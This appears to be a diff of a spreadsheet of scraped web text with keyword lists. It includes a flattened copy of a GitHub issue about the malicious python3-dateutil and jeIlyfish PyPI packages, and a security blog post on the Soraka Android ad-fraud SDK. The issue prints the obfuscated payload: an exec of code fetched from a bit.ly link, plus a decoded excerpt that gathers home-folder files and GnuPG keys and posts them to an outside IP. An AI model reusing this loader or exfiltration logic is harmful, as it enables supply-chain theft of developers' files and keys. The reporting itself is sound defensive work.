'company', 'example', 'action', 'influence', 'operation', 'several', 'nation', 'operation', 'inauthentic', 'news', 'outlet', 'message', 'russian', 'interest', 'local', 'account', 'people', 'operation', 'tactic', 'content', 'genuine', 'country', 'central', 'language', 'french', 'arabic', 'product', 'account', 'youtube', 'channel', 'space', 'discovery', 'consistent', 'recent', 'observation', 'action', 'facebook', 'consistent', 'recent', 'bellingcat', 'report', 'campaign', 'indonesian', 'province', 'opposition', 'advertising', 'account', 'channel', 'partnership', 'technology', 'company', 'platform', 'specialized', 'firm', 'intelligence', 'good', 'practice', 'information', 'enforcement', 'course', 'multiple', 'team', 'work', 'issue', 'goal', 'update', 'attack', 'stop', 'light', 'actor', 'helpful', 'community', 'future', 'attack', 'well', 'awareness', 'protection', 'highrisk', 'target', 'analysis', 'group', 'safety', 'story', 'safety', 'review', 'zeroday', 'inthewild', 'today', 'report', 'year', 'review', 'report', 'realtime', 'protection', 'group', 'bulletin', 'bulletin', 'influence', 'operation', 'campaign', 'platform', 'domain', 'safety', 'cybersecurity', 'vulnerability', 'design', 'safety', 'address', 'risk', 'opportunity', 'term', 'product', 'mena']</t>
         </is>
       </c>
     </row>
@@ -3748,17 +3258,12 @@
       </c>
       <c r="C128" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert dateutil dateutil public notifications fork star code issues pull requests actions projects wiki insights additional navigation options code issues pull requests actions projects wiki insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom fake version package pypi malicious code closed lutoma opened issue comments closed fake version package pypi malicious code lutoma opened issue comments comments copy link lutoma commented edited pganssle quick headsup fake version package called python3dateutil pypi contains additional imports jeilyfish package fake version jellyfish package first package turn contains malicious code starting line jeilyfishjellyfishpy import zlib import base64 edit pganssle raise exception exception added prevent people running accidentally zauthss zauthss ejx1u12pojaufedxkmwdmjgoidiyytyoih4gmiootmynqfsqqwolkv76rynzbdaz zauthss fwh7t849vec294lxexeet0xt6scxpawkkc9zyhk5jspl3kg5h74tuuleksk8aa zauthss 6sziysdryhmphgx1scuztigvxga92onkneql8ox5zmero4xnpdujb2nccrowxs2 zauthss wtvf3q7euyexevomhwlysleqhzth4tqkxpgippattvpw1a6fz7oa2m38nyzdqsh zauthss hcl0ksxcez8hcbazkdyuon4t8hs5qf0ktzhzxxqxbnxkxhka5zg18nhh0tazcj zauthss oal2xfvgxmjtn3lnoplj5xmshr4ywowheqnv8kfkf7a2qtel3adjbpbfsoezchf zauthss 9joqbxghnkadzcxtc1yqkiewrwvakij3xvrl6xss8s6ani3bpx5cgcr9il4xgb4b zauthss bw0ded5wwdyslqhqbp2iciwp3zjvins5hxfsmwfyvyjehbe0zgexioiy785bqjp zauthss fatlp1tzovr43anabgvosaq0kyyukgq7vbs7ycadqlbtaobhm8t4foxkwfyqqg zauthss hjagtb6idwepczx28tluczus3exusut7u6yx4gqpoveibgs1qfkospfeyu5qf zauthss mx1nd8xdaz2xjrbb8c1p5e1zwpxgepsallfptyx7tpnpjp9lqtestvwupnqr zauthss zbdxt9vcsl43i5ksclc0fuaz37blzjjhy69gmr2fa5otolpf187rlz1ritrg6zlp zauthss odqsjopv9nlm7juh1l2k2drsimcptmsxtfshl2rdvbyftbfehs0c29oypiwvvnk zauthss vs4nmfxznkmea3ex7lqpc8b92uj9knljfsymctitdwuiofjddadolujhjfykc2bz zauthss vghxcbafvhfxet1jvml3dmym3lzpmfv5n63qhk zauthss base64 b64decode zauthss zauthss zlib decompress zauthss zauthss exec zauthss deobfuscates 68cphj0gpahw4tu1grpiveicsrjspjwmbg 65sogl50g9gpogibl32m8sbosvpl1en01oewf7nbhsfa0evvvaqdbcpehgruc1neieppo xaxmrzxrp6ddjptfjhnorge8o0ficob418ejphaun9v9rudyvkdt1zovtk9dakh 3hllfiymdgazef9htcvhzolnphjtpupapv6dshphyc0qjy nyhqqurdce4ybaeoznpxdpwa9zwzkerqs2 sczmadxcdq71yf4ytpwary1zbw6wfaeberc2wiksdappasasb4s edit pganssle raise exception exception added prevent people running accidentally import stdout stderr stdout stderr open devnull open devnull urllib2 import urlopen except urllib request import urlopen exec zlib decompress base64 b16decode r09abcdef urlopen httpbitlycom25vzxubmkr read decode utf8 flags multiline upper except pass stdout stderr eul2g6011jp02didqxmlh7wf2romu0gy mzxrhcmghvyfgshvaslocy6fx3nu2pxtf3e7rh8fjgon4ye8jlnapb15wjltl9cdl6 y296 2ryf9kvmdkjppfnnovce2pkx6jfgupzfgyvnmefeyuor5ujudhakf6q1ji xi2b82dli4ft9f dfzjpcyfyh3v9gpuduppxodw0scsq1s4mznggjvm43gx2 sent email python team hope theyll take package well ones user soon meantime might good idea check correct version installed luckily days text updated successfully errors encountered peterschutt xerbo dmscat mahmoud abdulniyaspm tirkarthi jnatalzia joopeed hkraal reacted thumbs emoji rikvermeer dimart childofthecron kkulczak felipem775 eboth felipegr cyfrost reacted heart emoji alessiosavi cllbck rmachuca89 cyfrost reacted rocket emoji rdil amyjbrown reacted eyes emoji reactions reactions reactions reactions reactions copy link member pganssle commented email thank reporting lukas december lukas martini wrote quick headsup fake version package called python3dateutil pypi contains additional imports jeilyfish package fake version jellyfish package first package turn contains malicious code starting line jeilyfishjellyfishpy python import zlib import base64 zauthss zauthss ejx1u12pojaufedxkmwdmjgoidiyytyoih4gmiootmynqfsqqwolkv76rynzbdaz zauthss fwh7t849vec294lxexeet0xt6scxpawkkc9zyhk5jspl3kg5h74tuuleksk8aa zauthss 6sziysdryhmphgx1scuztigvxga92onkneql8ox5zmero4xnpdujb2nccrowxs2 zauthss wtvf3q7euyexevomhwlysleqhzth4tqkxpgippattvpw1a6fz7oa2m38nyzdqsh zauthss hcl0ksxcez8hcbazkdyuon4t8hs5qf0ktzhzxxqxbnxkxhka5zg18nhh0tazcj zauthss oal2xfvgxmjtn3lnoplj5xmshr4ywowheqnv8kfkf7a2qtel3adjbpbfsoezchf zauthss 9joqbxghnkadzcxtc1yqkiewrwvakij3xvrl6xss8s6ani3bpx5cgcr9il4xgb4b zauthss bw0ded5wwdyslqhqbp2iciwp3zjvins5hxfsmwfyvyjehbe0zgexioiy785bqjp zauthss fatlp1tzovr43anabgvosaq0kyyukgq7vbs7ycadqlbtaobhm8t4foxkwfyqqg zauthss hjagtb6idwepczx28tluczus3exusut7u6yx4gqpoveibgs1qfkospfeyu5qf zauthss mx1nd8xdaz2xjrbb8c1p5e1zwpxgepsallfptyx7tpnpjp9lqtestvwupnqr zauthss zbdxt9vcsl43i5ksclc0fuaz37blzjjhy69gmr2fa5otolpf187rlz1ritrg6zlp zauthss odqsjopv9nlm7juh1l2k2drsimcptmsxtfshl2rdvbyftbfehs0c29oypiwvvnk zauthss vs4nmfxznkmea3ex7lqpc8b92uj9knljfsymctitdwuiofjddadolujhjfykc2bz zauthss vghxcbafvhfxet1jvml3dmym3lzpmfv5n63qhk zauthss base64b64decodezauthss zauthss zlibdecompresszauthss zauthss execzauthss deobfuscates python 68cphj0gpahw4tu1grpiveicsrjspjwmbg 65sogl50g9gpogibl32m8sbosvpl1en01oewf7nbhsfa0evvvaqdbcpehgruc1neieppo xaxmrzxrp6ddjptfjhnorge8o0ficob418ejphaun9v9rudyvkdt1zovtk9dakh 3hllfiymdgazef9htcvhzolnphjtpupapv6dshphyc0qjy nyhqqurdce4ybaeoznpxdpwa9zwzkerqs2 sczmadxcdq71yf4ytpwary1zbw6wfaeberc2wiksdappasasb4s import resysos outerrsysstdoutsysstderr sysstdoutsysstderropenosdevnullwbopenosdevnullwb tryfrom urllib2 import urlopen exceptfrom urllibrequest import urlopen execzlibdecompressbase64b16decoderesub r09abcdefurlopen httpbitlycom25vzxubmkrreaddecodeutf8flagsremultiline 44upper exceptpass sysstdoutsysstderrouterr eul2g6011jp02didqxmlh7wf2romu0gy mzxrhcmghvyfgshvaslocy6fx3nu2pxtf3e7rh8fjgon4ye8jlnapb15wjltl9cdl6 y296 2ryf9kvmdkjppfnnovce2pkx6jfgupzfgyvnmefeyuor5ujudhakf6q1ji xi2b82dli4ft9f dfzjpcyfyh3v9gpuduppxodw0scsq1s4mznggjvm43gx2 sent email python team hope theyll take package well ones user soon meantime might good idea check correct version installed luckily days receiving subscribed thread reply email directly view github reactions sorry something went wrong copy link author lutoma commented python team responded theyve removed malicious packages unless action want take closed suppose adrianschmidt kaszanas cyfrost patmyron reacted thumbs emoji reactions reactions sorry something went wrong copy link coderanger commented bitly link points gitlabcom repo someone contacted take petdance ardrigh roboyoshi astrokiwi shepherd06 saad440 bladeoflight16 adrianschmidt cyfrost corbolais patmyron reacted thumbs emoji reactions reactions sorry something went wrong copy link member pganssle commented thanks lutoma close note asmeurer suggestion edited code deliberately modify order execute case someone blindly copypasting coderanger good idea gitlab showing user already reported abuse assume either inspired someone thanks lutoma amad pllim gagandeep shepherd06 saad440 hugovk adrianschmidt cyfrost corbolais reacted thumbs emoji reactions reactions sorry something went wrong pganssle closed completed copy link imankulov commented edited record wonders code actually heres excerpt decoded version home path expanduser path exists home data home data home data join listdir home data documents data join listdir path join home documents data downloads data join listdir path join home downloads data pycharmprojects data join listdir path join home pycharmprojects data save home files savefiles home data save files savefiles path join home data save keys savefiles path join home gnupg data save target savefile path join home downloadsitds20181015dracosrv1362pfx data data requests httpifconfigcojson text requests post http6818321224632258 data json dumps my3ndata data dump default lambda headers contenttype applicationjson ipaddress belongs digitalocean already reported form httpswwwdigitaloceancomcompanycontactabuse maciek aragon999 pllim nsagot insanitybit spokzers daniejstriata dhomeier annesylvie duetosymmetry reacted thumbs emoji artyom hostmaster bloomca pothix hassanqamar07 schnouki procaconsul olliejc gagandeep nobody43 reacted heart emoji reactions reactions reactions sorry something went wrong copy link ewjoachim commented edited pganssle imankulov want another raise exception snippet comment someone shoots foot djrscally saad440 adrianschmidt eboth kaszanas jslvtr sbres corbolais patmyron reacted thumbs emoji reactions reactions sorry something went wrong copy link plazmaz commented sake information gathering looks like bitly link pulled clicked total 278x httpsbitlycom25vzxubmkr direct referrals petdance lutoma lucjanstepientabc corbolais reacted thumbs emoji reactions reactions sorry something went wrong copy link thecedarprince commented quite disturbing know could identify package versus real dateutil package installation reactions sorry something went wrong copy link ivanlan9 commented pythondateutil also malicious python3 tree python3dateutil underneath documention tree went ahead removed anything breaks gullumluvl thewickedaxe adrianschmidt suddhasatwa reacted thumbs emoji reactions reactions sorry something went wrong copy link jesup commented fedora theres python3dateutil package build appears include jellyfish hypothesis renamed version pythondateutil redhat md5sum varcachepackagekit30metadatafedora30x8664packagespython3dateutil2801fc30noarchrpm cc57732e09ed35f85ff4916471387b08 varcachepackagekit30metadatafedora30x8664packagespython3dateutil2801fc30noarchrpm name python3dateutil epoch version release 1fc29 architecture noarch size source pythondateutil2751fc29srcrpm repository system repo updates packager fedora project buildtime install time installed root summary powerful extensions standard datetime module httpsgithubcomdateutildateutil license description dateutil module provides powerful extensions standard datetime module available python reactions sorry something went wrong copy link member pganssle commented thecedarprince freeze list everything installed package called python3dateutil malicious version ivanlan9 pythondateutil normal name package pypi jesup python3dateutil fairly common naming scheme linux distros ship code multiple languages presumably person called malicious package pypi package called python3dateutil malicious tell debian ubuntu fedora packages fine install able python3 freeze show pythondateutil python3 points system interpreter daneah thecedarprince lutoma youtah corbolais reacted thumbs emoji reactions reactions sorry something went wrong copy link seankim777 commented edited anyone hash value sha256 python3dateutil jeilyfish hunt within environment hash jeilyfishjellyfishpy hash file contains vicenteherrera corbolais reacted thumbs emoji reactions reactions sorry something went wrong copy link shayneoneill commented edited search pipy github find projects dependency give heads edit hits python3dateutil searching github code goddamn worms reactions sorry something went wrong abhitronix mentioned issue jeilyfish package malicious mean import jellyfish mohansuraj165capstone191 closed copy link abhitronix commented jeilyfish package stats downloads last downloads last week downloads last month httpspypistatsorgpackagesjeilyfish corbolais reacted thumbs emoji reactions reaction sorry something went wrong copy link vicenteherrera commented edit hits python3dateutil searching github code goddamn worms pganssle said naming scheme also used distro packages pypi libraries naming certainly name chosen first place wouldnt logic many existing instances wild couple days jeilyfish library around year read httpswwwzdnetcomarticletwomaliciouspythonlibrariesremovedfrompypi reactions sorry something went wrong hugovk mentioned issue replace malicious library mohansuraj165capstone192 merged erickatwork mentioned issue missing list supply chain attacks intotosupplychaincompromises2 open tasks copy link mingdbigdata commented running pypi erase malicious package local cache reactions sorry something went wrong added commit 4383capstone19 referenced issue securityfix stop jeilyfish move jellyfish 5af8953 jeilyfish fake package designed stoll files like keys keys patch stop move real jellyfish library dateutildateutil984 httpswwwzdnetcomarticletwomaliciouspythonlibrariesremovedfrompypi mentioned issue securityfix stop jeilyfish move jellyfish mohansuraj165capstone193 closed added commit 4383capstone19 referenced issue securityfix stop jeilyfish move jellyfish 5ac1458 jeilyfish fake package designed stole files like keys keys patch stop move real jellyfish library dateutildateutil984 httpswwwzdnetcomarticletwomaliciouspythonlibrariesremovedfrompypi copy link vicenteherrera commented running pypi erase malicious package local cache believe already requirements installed application library remain malicious code second stage code available server address longer available receive secrets recommend checking libraries change definitions legitimate ones change names imports installs remove remaining installed code subdirectories reactions sorry something went wrong copy link conan25216 commented jeilyfish package stats downloads last downloads last week downloads last month httpspypistatsorgpackagesjeilyfish python team already take package officical library download without mirror without mirror means download official library wrong without mirror thank reactions sorry something went wrong abma mentioned issue show hash motd springuberserver361 closed gridley mentioned issue defusedxml instead avoid known vulnerabilities openmcdevopenmc1775 closed sign free join conversation github already account sign comment assignees assigned labels none projects none milestone milestone development branches pull requests participants footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>There is a fake version of dateutil called python3-dateutil on PyPI that contains additional imports of the jeIlyfish package (itself a fake version of the jellyfish package, that first L is an I). That package in turn contains malicious code</t>
         </is>
       </c>
       <c r="D128" t="inlineStr">
         <is>
           <t>https://github.com/dateutil/dateutil/issues/984</t>
-        </is>
-      </c>
-      <c r="E128" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'public', 'notification', 'star', 'issue', 'request', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'wiki', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'fake', 'version', 'package', 'lutoma', 'issue', 'comment', 'fake', 'version', 'package', 'lutoma', 'issue', 'comment', 'comment', 'link', 'quick', 'fake', 'version', 'package', 'additional', 'import', 'jeilyfish', 'package', 'fake', 'version', 'jellyfish', 'package', 'first', 'package', 'turn', 'malicious', 'code', 'exception', 'exception', 'prevent', 'people', 'zauthss', 'zauthss', 'zauthss', 'zauthss', 'zauthss', 'fatlp1tzovr43anabgvosaq0kyyukgq7vbs7ycadqlbtaobhm8t4foxkwfyqqg', 'zauthss', 'base64', 'zauthss', 'decompress', 'zauthss', 'exec', 'zauthss', 'nyhqqurdce4ybaeoznpxdpwa9zwzkerqs2', 'sczmadxcdq71yf4ytpwary1zbw6wfaeberc2wiksdappasasb4', 'exception', 'exception', 'prevent', 'people', 'import', 'stdout', 'stderr', 'stdout', 'stderr', 'open', 'open', 'devnull', 'import', 'urlopen', 'urllib', 'request', 'import', 'urlopen', 'base64', 'urlopen', 'decode', 'flag', 'multiline', 'upper', 'stdout', 'stderr', 'dfzjpcyfyh3v9gpuduppxodw0scsq1s4mznggjvm43gx2', 'email', 'python', 'team', 'package', 'well', 'one', 'user', 'good', 'idea', 'correct', 'version', 'day', 'text', 'error', 'thumb', 'rikvermeer', 'dimart', 'rocket', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'link', 'member', 'email', 'thank', 'reporting', 'quick', 'fake', 'version', 'package', 'additional', 'import', 'jeilyfish', 'package', 'fake', 'version', 'jellyfish', 'package', 'first', 'package', 'turn', 'malicious', 'code', 'line', 'base64', 'zauthss', 'zauthss', 'zauthss', 'zauthss', 'fatlp1tzovr43anabgvosaq0kyyukgq7vbs7ycadqlbtaobhm8t4foxkwfyqqg', 'zauthss', 'zlibdecompresszauthss', 'execzauthss', '68cphj0gpahw4tu1grpiveicsrjspjwmbg', 'nyhqqurdce4ybaeoznpxdpwa9zwzkerqs2', 'sczmadxcdq71yf4ytpwary1zbw6wfaeberc2wiksdappasasb4', 'import', 'import', 'urlopen', 'urllibrequest', 'import', 'urlopen', 'r09abcdefurlopen', 'dfzjpcyfyh3v9gpuduppxodw0scsq1s4mznggjvm43gx2', 'email', 'python', 'team', 'package', 'well', 'one', 'user', 'good', 'idea', 'correct', 'version', 'day', 'thread', 'reply', 'email', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'python', 'team', 'malicious', 'package', 'action', 'closed', 'adrianschmidt', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'link', 'point', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'member', 'thank', 'close', 'note', 'asmeurer', 'suggestion', 'code', 'order', 'case', 'good', 'idea', 'user', 'abuse', 'thank', 'amad', 'shepherd06', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'record', 'wonder', 'code', 'excerpt', 'version', 'home', 'path', 'home', 'datum', 'home', 'home', 'datum', 'document', 'datum', 'home', 'document', 'datum', 'datum', 'home', 'datum', 'pycharmproject', 'home', 'pycharmproject', 'datum', 'home', 'file', 'home', 'datum', 'file', 'path', 'home', 'datum', 'key', 'gnupg', 'datum', 'save', 'target', 'home', 'downloadsitds20181015dracosrv1362pfx', 'datum', 'request', 'text', 'post', 'datum', 'dump', 'datum', 'dump', 'default', 'header', 'digitalocean', 'form', 'insanitybit', 'spokzer', 'thumb', 'nobody43', 'heart', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'exception', 'snippet', 'comment', 'foot', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'plazmaz', 'sake', 'information', 'gathering', 'link', 'total', 'httpsbitlycom25vzxubmkr', 'direct', 'referral', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'disturbing', 'know', 'package', 'real', 'package', 'installation', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'malicious', 'python3', 'tree', 'documention', 'tree', 'gullumluvl', 'thewickedaxe', 'adrianschmidt', 'thumb', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'fedora', 'package', 'build', 'hypothesis', 'version', 'redhat', 'cc57732e09ed35f85ff4916471387b08', 'version', 'release', 'architecture', 'noarch', 'size', 'source', 'repository', 'system', 'update', 'packager', 'fedora', 'project', 'buildtime', 'time', 'root', 'summary', 'powerful', 'extension', 'standard', 'datetime', 'module', 'license', 'description', 'module', 'powerful', 'extension', 'standard', 'datetime', 'module', 'available', 'python', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'member', 'list', 'package', 'normal', 'name', 'package', 'common', 'naming', 'scheme', 'code', 'multiple', 'language', 'person', 'malicious', 'package', 'pypi', 'package', 'fedora', 'fine', 'install', 'able', 'python3', 'show', 'point', 'system', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'hash', 'value', 'environment', 'file', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'search', 'pipy', 'project', 'dependency', 'give', 'head', 'worm', 'reaction', 'wrong', 'abhitronix', 'issue', 'jeilyfish', 'package', 'malicious', 'mean', 'copy', 'link', 'package', 'stat', 'last', 'download', 'last', 'week', 'download', 'last', 'month', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'vicenteherrera', 'edit', 'naming', 'scheme', 'library', 'name', 'first', 'place', 'many', 'instance', 'wild', 'couple', 'day', 'year', 'httpswwwzdnetcomarticletwomaliciouspythonlibrariesremovedfrompypi', 'reaction', 'sorry', 'wrong', 'issue', 'malicious', 'library', 'mohansuraj165capstone192', 'issue', 'list', 'supply', 'chain', 'attack', 'open', 'task', 'link', 'malicious', 'package', 'local', 'cache', 'reaction', 'sorry', 'issue', 'securityfix', 'fake', 'package', 'stoll', 'file', 'key', 'key', 'stop', 'real', 'jellyfish', 'issue', 'commit', 'issue', 'securityfix', 'jeilyfish', 'fake', 'package', 'file', 'key', 'key', 'stop', 'real', 'jellyfish', 'link', 'vicenteherrera', 'malicious', 'package', 'local', 'cache', 'application', 'library', 'malicious', 'code', 'second', 'stage', 'code', 'available', 'server', 'address', 'available', 'secret', 'library', 'definition', 'legitimate', 'one', 'name', 'import', 'code', 'subdirectory', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'jeilyfish', 'package', 'stat', 'last', 'download', 'last', 'week', 'download', 'last', 'month', 'httpspypistatsorgpackagesjeilyfish', 'python', 'team', 'package', 'officical', 'library', 'download', 'mirror', 'download', 'official', 'library', 'wrong', 'thank', 'reaction', 'wrong', 'issue', 'hash', 'motd', 'springuberserver361', 'issue', 'defusedxml', 'vulnerability', 'sign', 'free', 'join', 'conversation', 'sign', 'comment', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -3775,17 +3280,12 @@
       </c>
       <c r="C129" t="inlineStr">
         <is>
-          <t>secure forrester wave™ showcases leading management solutions learn platform human defense platform powerful platform safeguard entire organization digital attacks account takeover prevent account compromise account fraud detect fake account creation transaction abuse stop fraudulent financial transactions scraping block unwanted data exfiltration clientside avoid clientside attacks leakage compliance satisfy requirements data contamination ensure accurate data analytics programmatic fraud protect digital advertising transactions malvertising serve clean digital advertising finance healthcare insurance marketplaces public sector retail ecommerce streaming media technology platforms travel entertainment fintech holiday readiness guide stop fraud tracks ebook human google cloud help stave holiday blues august holiday report report grinch bots carding account abuse holiday season august ciso’s guide fraud prevention modern defense online fraud ebook incorporating modern cybersecurity defenses emphasizing proactive strategies cisos effectively safeguard organizations july products request free risk assessment learn human defender protect mobile applications apis sophisticated attacks account defender safeguard online accounts fraud abuse code defender protect website clientside supply chain attacks credential intelligence stop realworld credential stuffing attacks additional layer defense botguard growth marketing protection marketing funnel sales efforts mediaguard protection dsps ssps media owners brands fraud cleanad protect malvertising minimize vulnerabilities defend organization advanced threats fraud prevent business loss keep customer’s experience frictionfree tech protect advertising supply chains digital channel investments boost marketing improve performance marketing keeping fraudulent traffic digital channels product preserve digital experiences free fraud abuse real humans learn blog human insight research team case studies customers human webinars videos content human expertise industry intelligence resource center blogs whitepapers research videos articles—all place documentation details humans products interfaces satori intelligence research team human’s satori intelligence research team proactively uncovers disrupts botdriven threats insights insights need protect business bots account takeover fraud application blocking bots bots detection brute force attack captcha carding credential stuffing ecommerce fake account creation compliance harvesting shadow code supply chain attack scraping company human safeguards attacks fraud news human news careers find next career move human leadership meet elite hunters dedicated making internet safer place board directors meet minds behind human’s mission human collective collective protection fight adbased fraud satori intelligence research team human’s satori intelligence research team proactively uncover disrupt botdriven threats human overview human protect internet influences sophisticated bots read overview download partners human collective collective protection fight adbased fraud partnerships integrations human integrates several technology partners ensuring mitigation success environment resellers explore humans technology channel partners combining mitigation solutions become partner human collaborates worlds leading technology companies partner portal human partner portal collateral documentation partnership needs request free risk assessment request demo platform human defense platform powerful platform safeguard entire organization digital attacks account takeover prevent account compromise account fraud detect fake account creation transaction abuse stop fraudulent financial transactions scraping block unwanted data exfiltration clientside avoid clientside attacks leakage compliance satisfy requirements data contamination ensure accurate data analytics programmatic fraud protect digital advertising transactions malvertising serve clean digital advertising finance healthcare insurance marketplaces public sector retail ecommerce streaming media technology platforms travel entertainment fintech holiday readiness guide stop fraud tracks ebook human google cloud help stave holiday blues august holiday report report grinch bots carding account abuse holiday season august ciso’s guide fraud prevention modern defense online fraud ebook incorporating modern cybersecurity defenses emphasizing proactive strategies cisos effectively safeguard organizations july products request free risk assessment learn human defender protect mobile applications apis sophisticated attacks account defender safeguard online accounts fraud abuse code defender protect website clientside supply chain attacks credential intelligence stop realworld credential stuffing attacks additional layer defense botguard growth marketing protection marketing funnel sales efforts mediaguard protection dsps ssps media owners brands fraud cleanad protect malvertising minimize vulnerabilities defend organization advanced threats fraud prevent business loss keep customer’s experience frictionfree tech protect advertising supply chains digital channel investments boost marketing improve performance marketing keeping fraudulent traffic digital channels product preserve digital experiences free fraud abuse real humans learn blog human insight research team case studies customers human webinars videos content human expertise industry intelligence resource center blogs whitepapers research videos articles—all place documentation details humans products interfaces satori intelligence research team human’s satori intelligence research team proactively uncovers disrupts botdriven threats insights insights need protect business bots account takeover fraud application blocking bots bots detection brute force attack captcha carding credential stuffing ecommerce fake account creation compliance harvesting shadow code supply chain attack scraping company human safeguards attacks fraud news human news careers find next career move human leadership meet elite hunters dedicated making internet safer place board directors meet minds behind human’s mission human collective collective protection fight adbased fraud satori intelligence research team human’s satori intelligence research team proactively uncover disrupt botdriven threats human overview human protect internet influences sophisticated bots read overview download partners human collective collective protection fight adbased fraud partnerships integrations human integrates several technology partners ensuring mitigation success environment resellers explore humans technology channel partners combining mitigation solutions become partner human collaborates worlds leading technology companies partner portal human partner portal collateral documentation partnership needs request free risk assessment request demo contact sales connect human protection expert find products help meet project deadline needs blog human insight research team title subtitle content goes title subtitle content goes title subtitle content goes human blog bringing starchild earth soraka satori intelligence research team fraud white intelligence team recently identified malicious apps million downloads performing fraud apps common code package white dubbed “soraka” comandroidsorakalibrary addition soraka code package also discovered apps variant similar functionality dubbed “sogo” comandroidsogolibrary best fortune explorer example soraka package “best fortune explorer” publisher javiergentry80 released september published javiergentry80 best fortune explorer writing available google play store antivirus detections virustotal downloads fraud activity filters apps using framework called appsflyer mobile attribution marketing analytics displays fraudulent appsflyers determines installation organic meaning install attributed promotional effort fraudsters several filters code checks fraudulent shown user screen topactivity interval since installation trigger onoff switches network daily count limit trigger time interval space rendering trigger filtering likely mechanism avoid detection automated analysis services would install adhoc likely considered organic appsflyer mechanism also allows finegrain control receives fraud using controls serving platforms apps render outofcontext filter conditions appropriate soraka package found comandroidsorakalibrary utilizes several triggers make determination example returns integer array filters trigger pressing home button needs check running method public string hometask returns name trigger trigger classes implement method returning name obfuscate code make analysis difficult hometask creates class named cyrillic character part udmurt language class goes mopub method onadloaded function called start rendering process fraud white intelligence identified following ways rendered fraud upon unlocking device code removes background notification service halts fraud activity phone screen first outofcontext shown rendered couple seconds device unlocked second shown observed first minimized clicking hardware’s home button actions third shown rendered also code initiating fraud activity device screen host broadcast receivers best fortune explorer code dynamically registers broadcast listeners several actions important detect things like screen state user presence home button pressed manifest lists broadcast receivers class comflurryandroidadscommoncomponentaca onreceive function figure additional broadcast receivers located commopubcommoncac shown receivers actions noted code comments occur persistence main java based persistence mechanisms initiated java class commopubcommoncacb imports start service types persistences vary common ones alarms operating system syncable account service persisted possible services foreground available method alarm mechanism intent start comflurryandroidadscommoncomponentada service method starts periodically comflurryandroidadscommoncomponentadd version greater persisted” make even device restarts method ability create account “syncable” automatically synced method determines period syncing seconds seen account created seen device settingsaccounts besides java based persistence also uses native libraries native function lollipop library kitkat library enter infinite loop every seconds files checked locking callback java function called needed files checked force closed library detects brings back javacallback function wrap white intelligence team continues monitor packages identify emerging packages recommend removal apps listed indicators compromise section indicators compromise packages using soraka andor related sdks package name artphotoeditorbesthot bedtimereminderlitesleep comamithebestfriendshh comappodealtest combeautymirrorlite combedtimehelperandroid combkkmasterandroid comcalculatorgame comcardlife comcartooncameraproandroid comcodeidentifierandroid comcoderecognizerandroid comcolorspygame comcutekittenspuzzlegameandroid comcutelovetestandroid comdailywonderfullmoment comdailycostmasterandroid comdangerouswritingnote comdatasecuritedata comdaysdaysmatter365android comdaysremindcalendar comdetectornoisetool comdodgeemojigame comdogbarkpicturepuzzle comdrinkwaterremindyou comezzzfansleepnoise comfakecallgirlfriendprank2019 comfakecallerandroid comfakecallerplus comfalselocation comfancylovetestandroid comfastcodescannernmd comfilemanagerkiloproandroid comfilemanageruproandroid comfilemanageryoandroid comfilemanagerzeroproandroid comfinddifferencedetectivelittle comfindyoulovertest comframeeasyphone comfrankvideocalllite comfreecodescannernmd comfreeluckypredictiontest comfunnylietruthdetector comfunnywordgameenglish comgamecolorhunter comicesurvivalberg comidaysdayscounterandroid comimportantdaysmatter 